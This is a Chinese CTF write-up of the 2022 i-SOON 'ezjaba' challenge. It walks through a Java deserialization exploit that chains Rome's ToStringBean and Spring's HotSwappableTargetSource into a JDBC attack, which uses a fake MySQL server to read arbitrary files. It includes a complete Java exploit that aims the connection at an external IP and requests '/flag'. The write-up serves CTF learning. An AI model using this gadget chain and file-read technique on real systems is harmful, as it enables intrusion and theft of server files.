目录

前言

简单分析

step0

step1 确定攻击点

step2 利用链构造

EXP


前言

复现环境:GitHub - D0g3-Lab/i-SOON_CTF_2022: 2022 第五届安洵杯 题目环境/源码

Docker记得换镜像源,之前那个好像没有了(

这题考的是Rome打JDBC attack(Mysql任意文件读取)

参考文章:从BlackHat来看JDBC Attack - FreeBuf网络安全行业门户

简单分析

step0

【Web】记录2022安洵杯ezjaba题目复现——JDBC attack-LMLPHP

反序列化入口在/read路由下,有一段这样的处理

我们需要在序列化时对应加上对应内容,以过掉if判断,最后走到readObject

step1 确定攻击点

先扫一眼pom依赖

【Web】记录2022安洵杯ezjaba题目复现——JDBC attack-LMLPHP

有spring,rome和mysql&pgsql🤔

若JDBC连接的URL被攻击者控制,就可以让其指向恶意的MySQL服务器,完成JDBC attack

我们来看Database#getConnection

【Web】记录2022安洵杯ezjaba题目复现——JDBC attack-LMLPHP

getConnection通过拼接生成了一个JDBC连接串,之后将这个url传入了JdbcUtils.filterJdbcUrl方法中进行过滤

【Web】记录2022安洵杯ezjaba题目复现——JDBC attack-LMLPHP

限制了必须连接mysql,并ban掉了autoDeserialize和allowLoadLocalInfile属性

反序列化是走不通了,但不代表不能任意文件读取,像下面这篇文章的Mysql 任意文件读取姿势就不需要开启allowLoadLocalInfile也能打通

从BlackHat来看JDBC Attack - FreeBuf网络安全行业门户

那我们最后的目的就是要走到Database#getConnection,完成JDBC attack

step2 利用链构造

结合Rome依赖,不难想到可以利用toStringBean#toString来调getter,最后走到Database#getConnection

看一下ban了哪些

【Web】记录2022安洵杯ezjaba题目复现——JDBC attack-LMLPHP

主要关注toString触发点,ban了CC5的BadAttributeValueExpException还有EqualsBean

考虑到Spring依赖,自然就会想到HotSwappableTargetSource利用链

过于简单,不作赘述

参考文章:【Web】浅聊Java反序列化之Rome——关于其他利用链-CSDN博客

EXP

package com.example.ezjaba.exp;

import com.example.ezjaba.Connection.Database;
import com.rometools.rome.feed.impl.ToStringBean;
import com.sun.org.apache.xpath.internal.objects.XString;
import org.springframework.aop.target.HotSwappableTargetSource;

import java.io.*;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;

public class EXP {
    public static Field getField ( final Class<?> clazz, final String fieldName ) throws Exception {
        try {
            Field field = clazz.getDeclaredField(fieldName);
            if ( field != null )
                field.setAccessible(true);
            else if ( clazz.getSuperclass() != null )
                field = getField(clazz.getSuperclass(), fieldName);

            return field;
        }
        catch ( NoSuchFieldException e ) {
            if ( !clazz.getSuperclass().equals(Object.class) ) {
                return getField(clazz.getSuperclass(), fieldName);
            }
            throw e;
        }
    }
    //反射设置属性值
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }
    public static void main(String[] args) {
        try {
            Database database = new Database();
            database.setDatabase("mysql");
            database.setHots("124.222.136.33");
            database.setUsername("fileread_file:///flag&maxAllowedPacket=655360");
            database.setPassword("root");

            ToStringBean toStringBean = new ToStringBean(Database.class, database);

            //反序列化时HotSwappableTargetSource.equals会被调用,触发Xstring.equals
            HotSwappableTargetSource v1 = new HotSwappableTargetSource(toStringBean);
            HotSwappableTargetSource v2 = new HotSwappableTargetSource(new XString("xxx"));

            HashMap<Object, Object> s = new HashMap<>();
            setFieldValue(s, "size", 2);
            Class<?> nodeC;
            try {
                nodeC = Class.forName("java.util.HashMap$Node");
            }
            catch ( ClassNotFoundException e ) {
                nodeC = Class.forName("java.util.HashMap$Entry");
            }
            Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
            nodeCons.setAccessible(true);

            Object tbl = Array.newInstance(nodeC, 2);
            Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
            Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
            setFieldValue(s, "table", tbl);

            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
            objectOutputStream.writeUTF("axb");
            objectOutputStream.writeInt(2022);
            objectOutputStream.writeObject(s);

            byte[] bytes = byteArrayOutputStream.toByteArray();
            String s1 = Base64.getEncoder().encodeToString(bytes);
            System.out.println(s1);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

因为DataBase的端口写死了是5432,所以我们要改一下MySQL_Fake_Server的端口(3306=>5432)

【Web】记录2022安洵杯ezjaba题目复现——JDBC attack-LMLPHP 

url编码一次后提交

【Web】记录2022安洵杯ezjaba题目复现——JDBC attack-LMLPHP 

成功读到文件

【Web】记录2022安洵杯ezjaba题目复现——JDBC attack-LMLPHP

03-19 11:00